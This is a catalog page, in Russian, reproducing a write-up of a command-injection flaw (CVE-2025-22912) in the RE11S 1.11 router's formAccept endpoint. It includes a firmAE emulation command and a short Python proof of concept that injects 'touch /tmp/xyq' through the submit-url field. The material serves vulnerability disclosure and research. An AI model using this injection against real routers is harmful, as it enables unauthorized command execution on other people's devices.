Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RE11S_1.11-formAccept-CommandInjection — CVE-2025-22912 | Kitploit
Инструменты/GitHubGitHub/passwa11/re11s_1.11-formaccept-commandinjection
Безопасность встроенных системБезопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФаззингТестирование на ПроникновениеКомандование и Управление

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
passwa11/re11s_1.11-formaccept-commandinjection

RE11S_1.11-formAccept-CommandInjection

CVE-2025-22912

Репозиторий
1 год назадЕщё не проверено

RE11S_1.11-formAccept-CommandInjection

Во время стажировки в лаборатории Qi An Xin Tiangong Lab я обнаружил уязвимость внедрения команд в маршрутизаторе RE11S_1.11.

Проанализировав файл webs в каталоге bin, я обнаружил, что функция formAccept содержит уязвимость внедрения команд.

Внедрение команд может быть вызвано значением ключа submit-url, что приводит к внедрению системных команд.

image-20241224100434040

Как эмулировать маршрутизатор

Используйте следующую команду для эмуляции с помощью firmAE.

root@kitploit:~
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin

Содержимое файла poc.py следующее:

root@kitploit:~
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)

Результат атаки

image-20241224100515030

Видно, что после выполнения добавляется файл /tmp/xyq, что доказывает успешность атаки.

Скачать инструмент